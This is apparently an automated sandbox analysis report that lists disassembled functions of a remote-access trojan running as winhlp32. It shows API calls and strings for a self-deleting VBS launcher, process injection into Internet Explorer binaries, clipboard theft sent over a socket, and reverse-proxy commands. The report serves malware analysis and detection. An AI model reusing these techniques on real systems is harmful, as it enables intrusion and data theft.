                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                    • _free.LIBCMT ref: 004512FF
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00451321
                                    • _free.LIBCMT ref: 00451336
                                    • _free.LIBCMT ref: 00451341
                                    • _free.LIBCMT ref: 00451363
                                    • _free.LIBCMT ref: 00451376
                                    • _free.LIBCMT ref: 00451384
                                    • _free.LIBCMT ref: 0045138F
                                    • _free.LIBCMT ref: 004513C7
                                    • _free.LIBCMT ref: 004513CE
                                    • _free.LIBCMT ref: 004513EB
                                    • _free.LIBCMT ref: 00451403
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                      • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                      • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-3159800282
                                    • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                    • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                    • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                    • GetLastError.KERNEL32 ref: 00455CEF
                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                    • GetLastError.KERNEL32 ref: 00455D0C
                                    • __dosmaperr.LIBCMT ref: 00455D15
                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                    • GetLastError.KERNEL32 ref: 00455EB1
                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                    • __freea.LIBCMT ref: 0044AE30
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • __freea.LIBCMT ref: 0044AE39
                                    • __freea.LIBCMT ref: 0044AE5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID: $C$PkGNG
                                    • API String ID: 3864826663-3740547665
                                    • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                    • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                    • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                    • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    • API String ID: 269201875-253610517
                                    • Opcode ID: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                    • Opcode Fuzzy Hash: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 65535$udp
                                    • API String ID: 0-1267037602
                                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                    • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                    • __dosmaperr.LIBCMT ref: 0043A937
                                    • _free.LIBCMT ref: 0043A943
                                    • _free.LIBCMT ref: 0043A94A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                    • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                    • Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 00416941
                                    • EmptyClipboard.USER32 ref: 0041694F
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                    • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                    • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                    • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00448135
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00448141
                                    • _free.LIBCMT ref: 0044814C
                                    • _free.LIBCMT ref: 00448157
                                    • _free.LIBCMT ref: 00448162
                                    • _free.LIBCMT ref: 0044816D
                                    • _free.LIBCMT ref: 00448178
                                    • _free.LIBCMT ref: 00448183
                                    • _free.LIBCMT ref: 0044818E
                                    • _free.LIBCMT ref: 0044819C
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145
                                    • Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                    • Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                    • __fassign.LIBCMT ref: 0044B479
                                    • __fassign.LIBCMT ref: 0044B494
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 1324828854-263838557
                                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
